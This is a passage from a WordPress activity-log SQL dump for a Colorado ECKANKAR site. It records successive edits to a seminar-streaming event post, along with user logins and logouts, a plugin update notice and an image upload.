Living'),(242542,41154,'attachment_parent_post_type','mec-events'),(242543,41154,'_message_key','attachment_created'),(242544,41154,'_user_id','2'),(242545,41154,'_user_login','S8zhaBda'),(242546,41154,'_user_email','nada@zipnadanot.org'),(242547,41154,'_server_remote_addr','76.130.120.x'),(242548,41154,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242549,41155,'post_id','269387'),(242550,41155,'post_type','mec-events'),(242551,41155,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242552,41155,'post_prev_post_name',''),(242553,41155,'post_new_post_name','the-power-of-grace-a-secret-to-spiritual-living'),(242554,41155,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\n</span></strong></p>\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Featured Events Include:</span></p>\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\n</ul>\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\n<ul class=\"\">\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\n</ul>\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\n<p class=\"\">ECKSeminars.org</p>\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><em>New to ECK? Guests register free!</em></strong></span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\n</div>\n</div>\n</div>\n</div>'),(242555,41155,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Featured Events Include:</span></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\">ECKSeminars.org</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><em>New to ECK? Guests register free!</em></strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242556,41155,'post_prev_post_status','draft'),(242557,41155,'post_new_post_status','publish'),(242558,41155,'post_prev_post_date','2023-11-16 17:02:57'),(242559,41155,'post_new_post_date','2023-11-16 17:06:24'),(242560,41155,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(242561,41155,'post_new_post_date_gmt','2023-11-17 00:06:24'),(242562,41155,'post_prev_thumb_id','268961'),(242563,41155,'post_prev_thumb_title','2023-ESC-Oct-Seminar-web2'),(242564,41155,'post_new_thumb_id','269388'),(242565,41155,'post_new_thumb_title','power-of-grace-streaming-1'),(242566,41155,'_message_key','post_updated'),(242567,41155,'_user_id','2'),(242568,41155,'_user_login','S8zhaBda'),(242569,41155,'_user_email','nada@zipnadanot.org'),(242570,41155,'_server_remote_addr','76.130.120.x'),(242571,41155,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242572,41156,'post_id','269387'),(242573,41156,'post_type','mec-events'),(242574,41156,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242575,41156,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Featured Events Include:</span></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\">ECKSeminars.org</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><em>New to ECK? Guests register free!</em></strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242576,41156,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Featured Events Include:</span></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242577,41156,'_message_key','post_updated'),(242578,41156,'_user_id','2'),(242579,41156,'_user_login','S8zhaBda'),(242580,41156,'_user_email','nada@zipnadanot.org'),(242581,41156,'_server_remote_addr','76.130.120.x'),(242582,41156,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242583,41157,'post_id','269387'),(242584,41157,'post_type','mec-events'),(242585,41157,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242586,41157,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Featured Events Include:</span></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242587,41157,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><strong><span style=\"font-size: 16pt;\">Featured Events Include:</span></strong></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242588,41157,'_message_key','post_updated'),(242589,41157,'_user_id','2'),(242590,41157,'_user_login','S8zhaBda'),(242591,41157,'_user_email','nada@zipnadanot.org'),(242592,41157,'_server_remote_addr','76.130.120.x'),(242593,41157,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242594,41158,'post_id','269387'),(242595,41158,'post_type','mec-events'),(242596,41158,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242597,41158,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><strong><span style=\"font-size: 16pt;\">Featured Events Include:</span></strong></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242598,41158,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><strong><span style=\"font-size: 16pt;\">Featured Events Include:</span></strong></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">The keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">All main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">The 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242599,41158,'_message_key','post_updated'),(242600,41158,'_user_id','2'),(242601,41158,'_user_login','S8zhaBda'),(242602,41158,'_user_email','nada@zipnadanot.org'),(242603,41158,'_server_remote_addr','76.130.120.x'),(242604,41158,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242605,41159,'post_id','269387'),(242606,41159,'post_type','mec-events'),(242607,41159,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242608,41159,'_message_key','post_updated'),(242609,41159,'_user_id','2'),(242610,41159,'_user_login','S8zhaBda'),(242611,41159,'_user_email','nada@zipnadanot.org'),(242612,41159,'_server_remote_addr','76.130.120.x'),(242613,41159,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242614,41160,'_user_id','2'),(242615,41160,'_user_login','S8zhaBda'),(242616,41160,'_user_email','nada@zipnadanot.org'),(242617,41160,'_message_key','user_logged_out'),(242618,41160,'_server_remote_addr','76.130.120.x'),(242619,41160,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(242620,41161,'user_id','2'),(242621,41161,'user_email','nada@zipnadanot.org'),(242622,41161,'user_login','S8zhaBda'),(242623,41161,'_user_id','2'),(242624,41161,'_user_login','S8zhaBda'),(242625,41161,'_user_email','nada@zipnadanot.org'),(242626,41161,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242627,41161,'_message_key','user_logged_in'),(242628,41161,'_server_remote_addr','76.130.120.x'),(242629,41161,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242630,41162,'_user_id','2'),(242631,41162,'_user_login','S8zhaBda'),(242632,41162,'_user_email','nada@zipnadanot.org'),(242633,41162,'_message_key','user_logged_out'),(242634,41162,'_server_remote_addr','76.130.120.x'),(242635,41162,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(242636,41163,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(242637,41163,'plugin_current_version','3.1.2'),(242638,41163,'plugin_new_version','3.1.3'),(242639,41163,'_message_key','plugin_update_available'),(242640,41163,'_server_remote_addr','173.231.231.x'),(242641,41164,'user_id','15'),(242642,41164,'user_email','nadazipought@zilch.org'),(242643,41164,'user_login','john-admin-96'),(242644,41164,'_user_id','15'),(242645,41164,'_user_login','john-admin-96'),(242646,41164,'_user_email','nadazipought@zilch.org'),(242647,41164,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(242648,41164,'_message_key','user_logged_in'),(242649,41164,'_server_remote_addr','184.96.209.x'),(242650,41164,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(242651,41165,'post_id','269392'),(242652,41165,'post_type','mec-events'),(242653,41165,'post_title','Copy of Life&#8217;s Purpose'),(242654,41165,'_message_key','post_updated'),(242655,41165,'_user_id','15'),(242656,41165,'_user_login','john-admin-96'),(242657,41165,'_user_email','nadazipought@zilch.org'),(242658,41165,'_server_remote_addr','184.96.209.x'),(242659,41165,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(242660,41166,'post_type','attachment'),(242661,41166,'attachment_id','269394'),(242662,41166,'attachment_title','Relationships2'),(242663,41166,'attachment_filename','Relationships2.webp'),(242664,41166,'attachment_mime','image/webp'),(242665,41166,'attachment_filesize','32014'),(242666,41166,'attachment_parent_id','269392'),(242667,41166,'attachment_parent_title','Copy of Life&#8217;s 